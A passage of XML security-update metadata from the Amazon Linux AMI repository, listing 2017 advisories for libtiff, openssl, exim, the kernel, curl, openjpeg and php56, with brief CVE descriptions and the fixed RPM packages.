</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7459" title="" id="CVE-2013-7459" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-crypto-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-crypto-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-crypto-debuginfo-2.6.1-1.14.amzn1.x86_64.rpm</filename></package><package name="python26-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python26-crypto-2.6.1-1.14.amzn1.i686.rpm</filename></package><package name="python-crypto-debuginfo" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python-crypto-debuginfo-2.6.1-1.14.amzn1.i686.rpm</filename></package><package name="python27-crypto" version="2.6.1" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/python27-crypto-2.6.1-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-802</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-802: medium priority package update for libtiff compat-libtiff3</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9540:
tools/tiffcp.c in libtiff 4.0.6 has an out-of-bounds write on tiled images with odd tile width versus image width. Reported as MSVR 35103, aka &quot;cpStripToTile heap-buffer-overflow.&quot;
1397768:
CVE-2016-9540 libtiff: cpStripToTile heap-buffer-overflow
CVE-2016-9537:
tools/tiffcrop.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in buffers. Reported as MSVR 35093, MSVR 35096, and MSVR 35097.
1397760:
CVE-2016-9537 libtiff: Out-of-bounds write vulnerabilities in tools/tiffcrop.c
CVE-2016-9536:
tools/tiff2pdf.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in heap allocated buffers in t2p_process_jpeg_strip(). Reported as MSVR 35098, aka &quot;t2p_process_jpeg_strip heap-buffer-overflow.&quot;
1397758:
CVE-2016-9536 libtiff: t2p_process_jpeg_strip heap-buffer-overflow
CVE-2016-9535:
tif_predict.h and tif_predict.c in libtiff 4.0.6 have assertions that can lead to assertion failures in debug mode, or buffer overflows in release mode, when dealing with unusual tile size like YCbCr with subsampling. Reported as MSVR 35105, aka &quot;Predictor heap-buffer-overflow.&quot;
1397755:
CVE-2016-9535 libtiff: Predictor heap-buffer-overflow
CVE-2016-9534:
tif_write.c in libtiff 4.0.6 has an issue in the error code path of TIFFFlushData1() that didn&#039;t reset the tif_rawcc and tif_rawcp members. Reported as MSVR 35095, aka &quot;TIFFFlushData1 heap-buffer-overflow.&quot;
1397751:
CVE-2016-9534 libtiff: TIFFFlushData1 heap-buffer-overflow
CVE-2016-9533:
tif_pixarlog.c in libtiff 4.0.6 has out-of-bounds write vulnerabilities in heap allocated buffers. Reported as MSVR 35094, aka &quot;PixarLog horizontalDifference heap-buffer-overflow.&quot;
1397769:
CVE-2016-9533 libtiff: PixarLog horizontalDifference heap-buffer-overflow
CVE-2016-5652:
An exploitable heap-based buffer overflow exists in the handling of TIFF images in LibTIFF&#039;s TIFF2PDF tool. A crafted TIFF document can lead to a heap-based buffer overflow resulting in remote code execution. Vulnerability can be triggered via a saved TIFF file delivered by other means.
1389222:
CVE-2016-5652 libtiff: tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2015-8870:
Integer overflow in tools/bmp2tiff.c in LibTIFF before 4.0.4 allows remote attackers to cause a denial of service (heap-based buffer over-read), or possibly obtain sensitive information from process memory, via crafted width and length values in RLE4 or RLE8 data in a BMP file.
1402778:
CVE-2015-8870 libtiff: Integer overflow in tools/bmp2tiff.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8870" title="" id="CVE-2015-8870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5652" title="" id="CVE-2016-5652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9533" title="" id="CVE-2016-9533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9534" title="" id="CVE-2016-9534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9535" title="" id="CVE-2016-9535" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9536" title="" id="CVE-2016-9536" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9537" title="" id="CVE-2016-9537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9540" title="" id="CVE-2016-9540" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="27.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-27.29.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="27.29.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-27.29.amzn1.i686.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="21.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-21.15.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="21.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-3.9.4-21.15.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="21.15.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-21.15.amzn1.i686.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="21.15.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-3.9.4-21.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-803</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-803: medium priority package update for openssl</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3731:
An integer underflow leading to an out of bounds read flaw was found in OpenSSL. A remote attacker could possibly use this flaw to crash a 32-bit TLS/SSL server or client using OpenSSL if it used the RC4-MD5 cipher suite.
1416852:
CVE-2017-3731 openssl: Truncated packet could crash via OOB read
CVE-2016-8610:
A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections form other clients.
1384743:
CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8610" title="" id="CVE-2016-8610" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3731" title="" id="CVE-2017-3731" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.99.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.99.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.99.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-804</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-804: medium priority package update for exim</title><issued date="2017-03-06 14:00:00" /><updated date="2017-03-06 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9963:
It was found that Exim leaked DKIM signing private keys to the &quot;mainlog&quot; log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.
1405322:
CVE-2016-9963 exim: Possible information disclosure to remote atacker
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9963" title="" id="CVE-2016-9963" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.88" release="2.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.88-2.11.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.88-2.11.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.88" release="2.11.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.88-2.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-805</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-805: important priority package update for kernel</title><issued date="2017-03-06 14:00:00" /><updated date="2017-06-07 21:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6214:
A flaw was found in the Linux kernel&#039;s handling of packets with the URG flag. Applications using the splice() and tcp_splice_read() functionality can allow a remote attacker to force the kernel to enter a condition in which it can loop indefinitely.
1426542:
CVE-2017-6214 kernel: ipv4/tcp: Infinite loop in tcp_splice_read()
CVE-2017-6074:
A use-after-free flaw was found in the way the Linux kernel&#039;s Datagram Congestion Control Protocol (DCCP) implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket. A local, unprivileged user could use this flaw to alter the kernel memory, allowing them to escalate their privileges on the system.
1423071:
CVE-2017-6074 kernel: use after free in dccp protocol
CVE-2017-5986:
It was reported that with Linux kernel, earlier than version v4.10-rc8, an application may trigger a BUG_ON in sctp_wait_for_sndbuf if the socket tx buffer is full, a thread is waiting on it to queue more data, and meanwhile another thread peels off the association being used by the first thread.
1420276:
CVE-2017-5986 kernel: Reachable BUG_ON from userspace in sctp_wait_for_sndbuf
CVE-2017-5970:
A vulnerability was found in the Linux kernel where having malicious IP options present would cause the ipv4_pktinfo_prepare() function to drop/free the dst. This could result in a system crash or possible privilege escalation.
1421638:
CVE-2017-5970 kernel: ipv4: Invalid IP options could cause skb->dst drop
CVE-2017-5897:
An issue was found in the Linux kernel ipv6 implementation of GRE tunnels which allows a remote attacker to trigger an out-of-bounds access. At this time we understand no trust barrier has been crossed and there is no security implications in this flaw.
1419848:
CVE-2017-5897 kernel: ip6_gre: Invalid reads in ip6gre_err
CVE-2017-5551:
A vulnerability was found in the Linux kernel in &#039;tmpfs&#039; file system. When file permissions are modified via &#039;chmod&#039; and the user is not in the owning group or capable of CAP_FSETID, the setgid bit is cleared in inode_change_ok(). Setting a POSIX ACL via &#039;setxattr&#039; sets the file permissions as well as the new ACL, but doesn&#039;t clear the setgid bit in a similar way; this allows to bypass the check in &#039;chmod&#039;.
1416126:
CVE-2017-5551 kernel: S_ISGD is not cleared when setting posix ACLs in tmpfs (CVE-2016-7097 incomplete fix)
CVE-2016-7097:
A vulnerability was found in the Linux kernel. When file permissions are modified via chmod and the user is not in the owning group or capable of CAP_FSETID, the setgid bit is cleared in inode_change_ok(). Setting a POSIX ACL via setxattr sets the file permissions as well as the new ACL, but doesn&#039;t clear the setgid bit in a similar way; this allows to bypass the check in chmod.
1368938:
CVE-2016-7097 kernel: Setting a POSIX ACL via setxattr doesn't clear the setgid bit
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7097" title="" id="CVE-2016-7097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5551" title="" id="CVE-2017-5551" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5897" title="" id="CVE-2017-5897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5970" title="" id="CVE-2017-5970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5986" title="" id="CVE-2017-5986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6074" title="" id="CVE-2017-6074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6214" title="" id="CVE-2017-6214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.51-40.58.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.51" release="40.58.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.51-40.58.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.51" release="40.58.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.51-40.58.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-806</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-806: low priority package update for curl</title><issued date="2017-03-22 16:00:00" /><updated date="2017-03-22 16:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9586:
1406712:
CVE-2016-9586 curl: printf floating point buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9586" title="" id="CVE-2016-9586" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-9.70.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-9.70.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.70.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-9.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-807</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-807: medium priority package update for openjpeg</title><issued date="2017-03-22 16:00:00" /><updated date="2017-03-22 16:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9675:
A vulnerability was found in the patch for CVE-2013-6045 for OpenJPEG. A specially crafted JPEG2000 image, when read by an application using OpenJPEG, could cause heap-based buffer overflows leading to a crash or possible code execution.
1382202:
CVE-2016-9675 openjpeg: incorrect fix for CVE-2013-6045
CVE-2016-7163:
An integer overflow, leading to a heap buffer overflow, was found in OpenJPEG. An attacker could create a crafted JPEG2000 image that, when loaded by an application using openjpeg, could lead to a crash or, potentially, code execution.
1374329:
CVE-2016-7163 openjpeg: Integer overflow in opj_pi_create_decode
CVE-2016-5159:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause an incorrect calculation when allocating memory for code blocks, which could lead to a crash, or potentially, code execution.
1372220:
CVE-2016-5159 chromium-browser, openjpeg: heap overflow in parsing of JPEG2000 code blocks
CVE-2016-5158:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause incorrect calculations when allocating various data structures, which could lead to a crash, or potentially, code execution.
1372219:
CVE-2016-5158 chromium-browser, openjpeg: heap overflow due to unsafe use of opj_aligned_malloc
CVE-2016-5139:
An integer overflow, leading to a heap buffer overflow, was found in openjpeg, also affecting the PDF viewer in Chromium. A specially crafted JPEG2000 image could cause an incorrect calculation when allocating precinct data structures, which could lead to a crash, or potentially, code execution.
1363982:
CVE-2016-5139 chromium-browser, openjpeg: Heap overflow in parsing of JPEG2000 precincts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5139" title="" id="CVE-2016-5139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5158" title="" id="CVE-2016-5158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5159" title="" id="CVE-2016-5159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7163" title="" id="CVE-2016-7163" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9675" title="" id="CVE-2016-9675" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openjpeg-devel" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="16.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-16.9.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-16.9.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="16.9.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-16.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-808</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-808: medium priority package update for php56</title><issued date="2017-03-28 23:30:00" /><updated date="2017-03-29 22:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10168:
Integer overflow in gd_io.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to have unspecified impact via vectors involving the number of horizontal and vertical chunks in an image.
1418986:
CVE-2016-10168 gd: Integer overflow in gd_io.c
CVE-2016-10167:
The gdImageCreateFromGd2Ctx function in gd_gd2.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted image file.
1418984:
CVE-2016-10167 gd: DoS vulnerability in gdImageCreateFromGd2Ctx()
CVE-2016-10161:
The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.
1419010:
CVE-2016-10161 php: Out-of-bounds heap read on unserialize in finish_nested_data()
CVE-2016-10160:
Off-by-one error in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted PHAR archive with an alias mismatch.
1419018:
CVE-2016-10160 php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive
CVE-2016-10159:
Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.
1419020:
CVE-2016-10159 php: Integer overflow in phar_parse_pharfile
CVE-2016-10158:
It was found that the exif_convert_any_to_int() function in PHP was vulnerable to floating point exceptions when parsing tags in image files. A remote attacker with the ability to upload a malicious image could crash PHP, causing a Denial of Service.
1419015:
CVE-2016-10158 php: Wrong calculation in exif_convert_any_to_int function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10158" title="" id="CVE-2016-10158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159" title="" id="CVE-2016-10159" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10160" title="" id="CVE-2016-10160" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10161" title="" id="CVE-2016-10161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10167" title="" id="CVE-2016-10167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10168" title="" id="CVE-2016-10168" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-intl" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.30" release="1.133.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.30-1.133.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.30" release="1.133.amzn1" 